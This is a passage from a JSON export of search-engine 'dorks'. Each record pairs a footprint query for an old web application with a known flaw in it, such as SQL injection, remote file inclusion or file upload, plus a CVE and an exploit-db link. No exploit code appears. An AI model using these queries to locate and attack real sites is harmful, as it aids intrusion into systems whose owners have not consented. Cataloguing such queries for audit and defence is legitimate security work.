iBoutique v4.0", "long description": "iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: http://www.exploit-db.com/exploits/6444", "submited": "2010-11-15", "request": "Powered by iBoutique v4.0", "id": 3049}, {"short description": "\"Powered by ClanAdmin Tools v1.4.2\"", "long description": "ClanWeb 1.4.2 Remote Change Password / Add Admin: http://www.exploit-db.com/exploits/8717", "submited": "2010-11-15", "request": "\"Powered by ClanAdmin Tools v1.4.2\"", "id": 3050}, {"short description": "\"index.php?option=com_expose\"", "long description": "Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: http://www.exploit-db.com/exploits/4194", "submited": "2010-11-15", "request": "\"index.php?option=com_expose\"", "id": 3051}, {"short description": "inurl:yvcomment", "long description": "Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: http://www.exploit-db.com/exploits/5755", "submited": "2010-11-15", "request": "inurl:yvcomment", "id": 3052}, {"short description": "Powered by osCommerce | Customized by EZ-Oscommerce", "long description": "EZ-Oscommerce 3.1 Remote File Upload: http://www.exploit-db.com/exploits/14415", "submited": "2010-11-15", "request": "Powered by osCommerce | Customized by EZ-Oscommerce", "id": 3053}, {"short description": "\"kims Q - Administrator Login Mode\"", "long description": "KimsQ 040109 Multiple Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11960", "submited": "2010-11-15", "request": "\"kims Q - Administrator Login Mode\"", "id": 3054}, {"short description": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "long description": "Aim Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12791", "submited": "2010-11-15", "request": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "id": 3055}, {"short description": "Powered by One-News", "long description": "OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/6292", "submited": "2010-11-15", "request": "Powered by One-News", "id": 3056}, {"short description": "\"Powered by PHP Director\"", "long description": "PHPDirector", "submited": "2010-11-15", "request": "\"Powered by PHP Director\"", "id": 3058}, {"short description": "\"Webdesign Cosmos Solutions\"", "long description": "Cosmos Solutions cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12793", "submited": "2010-11-15", "request": "\"Webdesign Cosmos Solutions\"", "id": 3059}, {"short description": "inurl:\"com_hestar\"", "long description": "Mambo Component com_hestar Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9609", "submited": "2010-11-15", "request": "inurl:\"com_hestar\"", "id": 3061}, {"short description": "\"Powered by NovaBoard v1.0.0\"", "long description": "NovaBoard 1.0.0 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8063", "submited": "2010-11-15", "request": "\"Powered by NovaBoard v1.0.0\"", "id": 3062}, {"short description": "inurl:es_offer.php?files_dir=", "long description": "Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: http://www.exploit-db.com/exploits/4352", "submited": "2010-11-15", "request": "inurl:es_offer.php?files_dir=", "id": 3063}, {"short description": "inurl:index.php?option=com_joomlaconnect_be", "long description": "Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11578", "submited": "2010-11-15", "request": "inurl:index.php?option=com_joomlaconnect_be", "id": 3065}, {"short description": "\"Powered by TinyPHPForum v3.61\"", "long description": "TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: http://www.exploit-db.com/exploits/8342", "submited": "2010-11-15", "request": "\"Powered by TinyPHPForum v3.61\"", "id": 3066}, {"short description": "intitle:\"CCMS v3.1 Demo PW\"", "long description": "CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: http://www.exploit-db.com/exploits/4809", "submited": "2010-11-15", "request": "intitle:\"CCMS v3.1 Demo PW\"", "id": 3068}, {"short description": "\"powered by mcGalleryPRO\"", "long description": "mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: http://www.exploit-db.com/exploits/2342", "submited": "2010-11-15", "request": "\"powered by mcGalleryPRO\"", "id": 3070}, {"short description": "Powered by Dayfox Designs This is a port of WordPress", "long description": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: http://www.exploit-db.com/exploits/6203", "submited": "2010-11-15", "request": "Powered by Dayfox Designs This is a port of WordPress", "id": 3071}, {"short description": "\"Powered By EgyPlus\"", "long description": "EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: http://www.exploit-db.com/exploits/8865", "submited": "2010-11-15", "request": "\"Powered By EgyPlus\"", "id": 3072}, {"short description": "inurl:com_seminar", "long description": "Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: http://www.exploit-db.com/exploits/8867", "submited": "2010-11-15", "request": "inurl:com_seminar", "id": 3073}, {"short description": "allintext:\"Powered By Buddy Zone\"", "long description": "Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: http://www.exploit-db.com/exploits/4128", "submited": "2010-11-15", "request": "allintext:\"Powered By Buddy Zone\"", "id": 3074}, {"short description": "inurl:index.php?option=com_ice", "long description": "Joomla Component com_ice Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11544", "submited": "2010-11-15", "request": "inurl:index.php?option=com_ice", "id": 3075}, {"short description": "Powered by LiteCommerce", "long description": "litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: http://www.exploit-db.com/exploits/4300", "submited": "2010-11-15", "request": "Powered by LiteCommerce", "id": 3076}, {"short description": "\"Web Group Communication Center\"", "long description": "Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: http://www.exploit-db.com/exploits/5606", "submited": "2010-11-15", "request": "\"Web Group Communication Center\"", "id": 3077}, {"short description": "inurl:com_xewebtv", "long description": "Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: http://www.exploit-db.com/exploits/5966", "submited": "2010-11-15", "request": "inurl:com_xewebtv", "id": 3078}, {"short description": "inurl:index.php?option=com_paxgallery", "long description": "Joomla Component com_paxgallery Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11595", "submited": "2010-11-15", "request": "inurl:index.php?option=com_paxgallery", "id": 3080}, {"short description": "\"Site designed and built by ProWeb Associates.\"", "long description": "ProWeb Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12730", "submited": "2010-11-15", "request": "\"Site designed and built by ProWeb Associates.\"", "id": 3082}, {"short description": "Powered by iScripts SocialWare", "long description": "Upload Vulnerability and XSS in socialware V2.2: http://www.exploit-db.com/exploits/12448", "submited": "2010-11-15", "request": "Powered by iScripts SocialWare", "id": 3083}, {"short description": "\"(C) This site is NITROpowered!\"", "long description": "NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: http://www.exploit-db.com/exploits/12735", "submited": "2010-11-15", "request": "\"(C) This site is NITROpowered!\"", "id": 3084}, {"short description": "\"phpQuestionnaire v3\"", "long description": "phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: http://www.exploit-db.com/exploits/2410", "submited": "2010-11-15", "request": "\"phpQuestionnaire v3\"", "id": 3085}, {"short description": "\"generated by Exhibit Engine 1.5 RC 4\"", "long description": "Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: http://www.exploit-db.com/exploits/2509", "submited": "2010-11-15", "request": "\"generated by Exhibit Engine 1.5 RC 4\"", "id": 3086}, {"short description": "powered by connectix boards", "long description": "Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: http://www.exploit-db.com/exploits/5012", "submited": "2010-11-15", "request": "powered by connectix boards", "id": 3087}, {"short description": "inurl:com_ezstore", "long description": "Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: http://www.exploit-db.com/exploits/6199", "submited": "2010-11-15", "request": "inurl:com_ezstore", "id": 3088}, {"short description": "\"FrontAccounting\"", "long description": "FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: http://www.exploit-db.com/exploits/4456", "submited": "2010-11-15", "request": "\"FrontAccounting\"", "id": 3089}, {"short description": "inurl:\"option=com_elite_experts\"", "long description": "Joomla Component (com_elite_experts) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15100", "submited": "2010-11-15", "request": "inurl:\"option=com_elite_experts\"", "id": 3090}, {"short description": "inurl:\"com_tupinambis\"", "long description": "Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: http://www.exploit-db.com/exploits/9832", "submited": "2010-11-15", "request": "inurl:\"com_tupinambis\"", "id": 3091}, {"short description": "\"Powered By Basic CMS SweetRice\"", "long description": "SweetRice 0.6.4 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/14184", "submited": "2010-11-15", "request": "\"Powered By Basic CMS SweetRice\"", "id": 3092}, {"short description": "\"Powered by AMCMS3\"", "long description": "Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: http://www.exploit-db.com/exploits/4326", "submited": "2010-11-15", "request": "\"Powered by AMCMS3\"", "id": 3093}, {"short description": "\"Web Site Design by Red Cat Studios\"", "long description": "Realtor WebSite System E-Commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12772", "submited": "2010-11-15", "request": "\"Web Site Design by Red Cat Studios\"", "id": 3094}, {"short description": "inurl:index.php?option=com_liveticker \"viewticker\"", "long description": "Joomla Component com_liveticker Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11604", "submited": "2010-11-15", "request": "inurl:index.php?option=com_liveticker \"viewticker\"", "id": 3095}, {"short description": "allinurl:\"com_cinema\"", "long description": "Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5300", "submited": "2010-11-15", "request": "allinurl:\"com_cinema\"", "id": 3101}, {"short description": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "long description": "Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9460", "submited": "2010-11-15", "request": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "id": 3103}, {"short description": "\"Powered by Clipshare\"", "long description": "ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: http://www.exploit-db.com/exploits/4837", "submited": "2010-11-15", "request": "\"Powered by Clipshare\"", "id": 3104}, {"short description": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "long description": "PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: http://www.exploit-db.com/exploits/5136", "submited": "2010-11-15", "request": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "id": 3106}, {"short description": "inurl:com_jejob", "long description": "Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12782", "submited": "2010-11-15", "request": "inurl:com_jejob", "id": 3108}, {"short description": "\"Devana is an open source project !\"", "long description": "Devana SQL Injection vulnerability - CVE: 2010-2673: http://www.exploit-db.com/exploits/11922", "submited": "2010-11-15", "request": "\"Devana is an open source project !\"", "id": 3109}, {"short description": "inurl:\"com_jpodium\"", "long description": "Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14232", "submited": "2010-11-15", "request": "inurl:\"com_jpodium\"", "id": 3110}, {"short description": "intext:\"Powered by: Virtual War v1.5.0\"", "long description": "VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: http://www.exploit-db.com/exploits/2170", "submited": "2010-11-15", "request": "intext:\"Powered by: Virtual War v1.5.0\"", "id": 3111}, {"short description": "inurl:index.php/option?com_flexicontent", "long description": "Joomla Component com_flexicontent Local File Vulnerability: http://www.exploit-db.com/exploits/12185", "submited": "2010-11-15", "request": "inurl:index.php/option?com_flexicontent", "id": 3112}, {"short description": "inurl:option=com_agenda", "long description": "Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: http://www.exploit-db.com/exploits/12132", "submited": "2010-11-15", "request": "inurl:option=com_agenda", "id": 3113}, {"short description": "inurl:\"index.php?css=mid=art=\"", "long description": "EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: http://www.exploit-db.com/exploits/5706", "submited": "2010-11-15", "request": "inurl:\"index.php?css=mid=art=\"", "id": 3118}, {"short description": "\"Powered By Webcards\"", "long description": "WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: http://www.exploit-db.com/exploits/6869", "submited": "2010-11-15", "request": "\"Powered By Webcards\"", "id": 3120}, {"short description": "\"sitio web disenado por www.toronja.com.pe\"", "long description": "toronja cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12770", "submited": "2010-11-15", "request": "\"sitio web disenado por www.toronja.com.pe\"", "id": 3123}, {"short description": "E-Commerce Engine Copyright 2005 osCSS", "long description": "osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: http://www.exploit-db.com/exploits/12856", "submited": "2010-11-15", "request": "E-Commerce Engine Copyright 2005 osCSS", "id": 3124}, {"short description": "Powered by Bug Software intext:Your Cart Contains", "long description": "BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2007-3448: http://www.exploit-db.com/exploits/4103", "submited": "2010-11-15", "request": "Powered by Bug Software intext:Your Cart Contains", "id": 3126}, {"short description": "Winn ASP Guestbook from Winn.ws", "long description": "Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: http://www.exploit-db.com/exploits/8596", "submited": "2010-11-15", "request": "Winn ASP Guestbook from Winn.ws", "id": 3127}, {"short description": "inurl:option=com_n-forms form_id", "long description": "Mambo Component n-form (form_id) Blind SQL Injection: http://www.exploit-db.com/exploits/7064", "submited": "2010-11-15", "request": "inurl:option=com_n-forms form_id", "id": 3128}, {"short description": "intext:\"English for dummies\"", "long description": "Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: http://www.exploit-db.com/exploits/9144", "submited": "2010-11-15", "request": "intext:\"English for dummies\"", "id": 3129}, {"short description": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "long description": "Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: http://www.exploit-db.com/exploits/10238", "submited": "2010-11-15", "request": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "id": 3131}, {"short description": "\"Powered by GGCMS\"", "long description": "GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: http://www.exploit-db.com/exploits/3271", "submited": "2010-11-15", "request": "\"Powered by GGCMS\"", "id": 3133}, {"short description": "Powered by Ac4p.com Gallery v1.0 , Copyright 2007 ac4p.com", "long description": "Ac4p.com Gallery v1.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11519", "submited": "2010-11-15", "request": "Powered by Ac4p.com Gallery v1.0 , Copyright 2007 ac4p.com", "id": 3134}, {"short description": "inurl:index.php?menu=showcat", "long description": "ACG-ScriptShop (cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: http://www.exploit-db.com/exploits/6364", "submited": "2010-11-15", "request": "inurl:index.php?menu=showcat", "id": 3135}, {"short description": "Powered by minb", "long description": "minb 0.1.0 Remote Code Execution - CVE: 2008-7005: http://www.exploit-db.com/exploits/6432", "submited": "2010-11-15", "request": "Powered by minb", "id": 3136}, {"short description": "\"Powered by phpCC Beta 4.2\"", "long description": "phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: http://www.exploit-db.com/exploits/2134", "submited": "2010-11-15", "request": "\"Powered by phpCC Beta 4.2\"", "id": 3137}, {"short description": "inurl:index.php?menu=showcat=", "long description": "Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: http://www.exploit-db.com/exploits/6396", "submited": "2010-11-15", "request": "inurl:index.php?menu=showcat=", "id": 3138}, {"short description": "intext:elkagroup  Image Gallery v1.0", "long description": "elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: http://www.exploit-db.com/exploits/4114", "submited": "2010-11-15", "request": "intext:elkagroup  Image Gallery v1.0", "id": 3143}, {"short description": "Powered by Digital College 1.0 - Magtrb Soft 2010", "long description": "Digital College 1.0 Upload Vulnerability: http://www.exploit-db.com/exploits/12568", "submited": "2010-11-15", "request": "Powered by Digital College 1.0 - Magtrb Soft 2010", "id": 3144}, {"short description": "\"powered by AMCMS3\"", "long description": "Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: http://www.exploit-db.com/exploits/4905", "submited": "2010-11-15", "request": "\"powered by AMCMS3\"", "id": 3145}, {"short description": "inurl:\"e107_plugins/my_gallery\"", "long description": "e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: http://www.exploit-db.com/exploits/5308", "submited": "2010-11-15", "request": "inurl:\"e107_plugins/my_gallery\"", "id": 3146}, {"short description": "\"Powered by BIGACE 2.4\"", "long description": "BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities  - CVE: 2008-2520: http://www.exploit-db.com/exploits/5596", "submited": "2010-11-15", "request": "\"Powered by BIGACE 2.4\"", "id": 3147}, {"short description": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "long description": "Wordpress Plugin e-Commerce", "submited": "2010-11-15", "request": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "id": 3148}, {"short description": "intitle:\"igenus webmail login\"", "long description": "iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: http://www.exploit-db.com/exploits/1527", "submited": "2010-11-15", "request": "intitle:\"igenus webmail login\"", "id": 3150}, {"short description": "\"Powered by  www.aspportal.net\"", "long description": "ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: http://www.exploit-db.com/exploits/5775", "submited": "2010-11-15", "request": "\"Powered by  www.aspportal.net\"", "id": 3151}, {"short description": "inurl:\"com_ijoomla_archive\"", "long description": "Joomla com_ijoomla_archive Blind SQL Injectio: http://www.exploit-db.com/exploits/8164", "submited": "2010-11-15", "request": "inurl:\"com_ijoomla_archive\"", "id": 3152}, {"short description": "\"Power by Blakord Portal\"", "long description": "Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: http://www.exploit-db.com/exploits/4793", "submited": "2010-11-15", "request": "\"Power by Blakord Portal\"", "id": 3154}, {"short description": "\"Powered by FreeWebshop\"", "long description": "FreeWebshop", "submited": "2010-11-15", "request": "\"Powered by FreeWebshop\"", "id": 3155}, {"short description": "intext:\"Designed by Spaceacre\"", "long description": "Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities: http://www.exploit-db.com/exploits/12746", "submited": "2010-11-15", "request": "intext:\"Designed by Spaceacre\"", "id": 3156}, {"short description": "inurl:option=com_mv_restaurantmenumanager", "long description": "Joomla component mv_restaurantmenumanager SQL injection Vulnerability: http://www.exploit-db.com/exploits/12162", "submited": "2010-11-15", "request": "inurl:option=com_mv_restaurantmenumanager", "id": 3157}, {"short description": "inurl:\"com_ajaxchat\"", "long description": "Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: http://www.exploit-db.com/exploits/9888", "submited": "2010-11-15", "request": "inurl:\"com_ajaxchat\"", "id": 3158}, {"short description": "Powered by: AIH v2.3", "long description": "Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: http://www.exploit-db.com/exploits/8238", "submited": "2010-11-15", "request": "Powered by: AIH v2.3", "id": 3160}, {"short description": "inurl:/macgurublog_menu/", "long description": "e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: http://www.exploit-db.com/exploits/5604", "submited": "2010-11-15", "request": "inurl:/macgurublog_menu/", "id": 3162}, {"short description": "inurl:\"?page=duyurular_detay&amp;id=\"", "long description": "Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: http://www.exploit-db.com/exploits/4224", "submited": "2010-11-15", "request": "inurl:\"?page=duyurular_detay&amp;id=\"", "id": 3164}, {"short description": "\"X-CART. Powerful PHP shopping cart software\"", "long description": "X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: http://www.exploit-db.com/exploits/4396", "submited": "2010-11-15", "request": "\"X-CART. Powerful PHP shopping cart software\"", "id": 3165}, {"short description": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "long description": "e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: http://www.exploit-db.com/exploits/12818", "submited": "2010-11-15", "request": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "id": 3166}, {"short description": "\"S-CMS by matteoiamma\"", "long description": "S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/8913", "submited": "2010-11-15", "request": "\"S-CMS by matteoiamma\"", "id": 3167}, {"short description": "allinurl:offers.php?id=", "long description": "B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12532", "submited": "2010-11-15", "request": "allinurl:offers.php?id=", "id": 3168}, {"short description": "\"Powered By HASHE\"", "long description": "HASHE! Solutions Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/11383", "submited": "2010-11-15", "request": "\"Powered By HASHE\"", "id": 3169}, {"short description": "inurl:we_objectID=", "long description": "webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: http://www.exploit-db.com/exploits/6281", "submited": "2010-11-15", "request": "inurl:we_objectID=", "id": 3170}, {"short description": "\"2009 Jorp\"", "long description": "Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: http://www.exploit-db.com/exploits/8752", "submited": "2010-11-15", "request": "\"2009 Jorp\"", "id": 3172}, {"short description": "Powered by Orbis CMS", "long description": "Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9309", "submited": "2010-11-15", "request": "Powered by Orbis CMS", "id": 3174}, {"short description": "inurl:\"index.php?edicion_id=\"", "long description": "Delivering Digital Media CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12840", "submited": "2010-11-15", "request": "inurl:\"index.php?edicion_id=\"", "id": 3176}, {"short description": "inurl:\"CIHUY\"", "long description": "Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: http://www.exploit-db.com/exploits/14466", "submited": "2010-11-15", "request": "inurl:\"CIHUY\"", "id": 3177}, {"short description": "\"/subcat.php?cate_id=\"", "long description": "AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: http://www.exploit-db.com/exploits/3411", "submited": "2010-11-15", "request": "\"/subcat.php?cate_id=\"", "id": 3178}, {"short description": "Powered by Marinet", "long description": "Marinet cms SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12577", "submited": "2010-11-15", "request": "Powered by Marinet", "id": 3179}, {"short description": "allinurl:clientsignup.php \"classifieds\"", "long description": "Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: http://www.exploit-db.com/exploits/7408", "submited": "2010-11-15", "request": "allinurl:clientsignup.php \"classifieds\"", "id": 3181}, {"short description": "Powered by TeamCal Pro", "long description": "TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: http://www.exploit-db.com/exploits/4785", "submited": "2010-11-15", "request": "Powered by TeamCal Pro", "id": 3182}, {"short description": "\"mumbo jumbo media\" + inurl:\"index.php\"", "long description": "Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: http://www.exploit-db.com/exploits/5440", "submited": "2010-11-15", "request": "\"mumbo jumbo media\" + inurl:\"index.php\"", "id": 3188}, {"short description": "inurl:\"cal_day.php?op=day&amp;catview=\"", "long description": "Calendarix v0.8.20071118 SQL Injection: http://www.exploit-db.com/exploits/11443", "submited": "2010-11-15", "request": "inurl:\"cal_day.php?op=day&amp;catview=\"", "id": 3189}, {"short description": "intext:\"pLink 2.07\"", "long description": "pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: http://www.exploit-db.com/exploits/6449", "submited": "2010-11-15", "request": "intext:\"pLink 2.07\"", "id": 3190}, {"short description": "netGitar.com - Shop v1.0", "long description": "Net Gitar Shopv1.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11016", "submited": "2010-11-15", "request": "netGitar.com - Shop v1.0", "id": 3191}, {"short description": "allinurl:fullview.php?tempid=", "long description": "Template Seller Pro 3.25 (tempid) Remote SQL Injection: http://www.exploit-db.com/exploits/12360", "submited": "2010-11-15", "request": "allinurl:fullview.php?tempid=", "id": 3192}, {"short description": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "long description": "Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: http://www.exploit-db.com/exploits/6070", "submited": "2010-11-15", "request": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "id": 3194}, {"short description": "allinurl:casting_view.php?adnum=", "long description": "Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: http://www.exploit-db.com/exploits/12443", "submited": "2010-11-15", "request": "allinurl:casting_view.php?adnum=", "id": 3195}, {"short description": "www.stwc-counter.de", "long description": "STWC-Counter", "submited": "2010-11-15", "request": "www.stwc-counter.de", "id": 3196}, {"short description": "[ Powered by: RadLance v7.5 ]", "long description": "RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: http://www.exploit-db.com/exploits/9195", "submited": "2010-11-15", "request": "[ Powered by: RadLance v7.5 ]", "id": 3197}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14095", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3199}, {"short description": "VevoCart Control System", "long description": "Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: http://www.exploit-db.com/exploits/11134", "submited": "2010-11-15", "request": "VevoCart Control System", "id": 3201}, {"short description": "inurl:\"com_digifolio\"", "long description": "Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: http://www.exploit-db.com/exploits/9534", "submited": "2010-11-15", "request": "inurl:\"com_digifolio\"", "id": 3203}, {"short description": "\"index.php?option=com_resman\"", "long description": "Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: http://www.exploit-db.com/exploits/3564", "submited": "2010-11-15", "request": "\"index.php?option=com_resman\"", "id": 3204}, {"short description": "allinurl:offers_buy.php?id=", "long description": "EC21 Clone 3.0 (id) SQL Injection Vulnerability - CVE: 2010-1726: http://www.exploit-db.com/exploits/12459", "submited": "2010-11-15", "request": "allinurl:offers_buy.php?id=", "id": 3205}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14129", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3206}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout 2.08 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12407", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 3207}, {"short description": "\"index.php?option=com_rwcards\"", "long description": "Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: http://www.exploit-db.com/exploits/3565", "submited": "2010-11-15", "request": "\"index.php?option=com_rwcards\"", "id": 3208}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14114", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3209}, {"short description": "Powered by Comersus v6 Shopping Cart", "long description": "Comersus Shopping Cart v6 Remote User Pass: http://www.exploit-db.com/exploits/7736", "submited": "2010-11-15", "request": "Powered by Comersus v6 Shopping Cart", "id": 3210}, {"short description": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "long description": "Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: http://www.exploit-db.com/exploits/6574", "submited": "2010-11-15", "request": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "id": 3211}, {"short description": "inurl:\"com_fastball\"", "long description": "Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: http://www.exploit-db.com/exploits/9822", "submited": "2010-11-15", "request": "inurl:\"com_fastball\"", "id": 3212}, {"short description": "\"Powered by MobPartner\" inurl:\"chat.php\"", "long description": "MobPartner Chat Multiple Sql Injection Vulnerabilities: http://www.exploit-db.com/exploits/11321", "submited": "2010-11-15", "request": "\"Powered by MobPartner\" inurl:\"chat.php\"", "id": 3216}, {"short description": "[ Content Copyright 2007 RadNics Gold ]", "long description": "RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: http://www.exploit-db.com/exploits/9196", "submited": "2010-11-15", "request": "[ Content Copyright 2007 RadNics Gold ]", "id": 3217}, {"short description": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "long description": "iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: http://www.exploit-db.com/exploits/5761", "submited": "2010-11-15", "request": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "id": 3218}, {"short description": "Lebi soft Ziyaretci Defteri_v7.5", "long description": "Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: http://www.exploit-db.com/exploits/11015", "submited": "2010-11-15", "request": "Lebi soft Ziyaretci Defteri_v7.5", "id": 3219}, {"short description": "allinurl:offers_buy.php?id=", "long 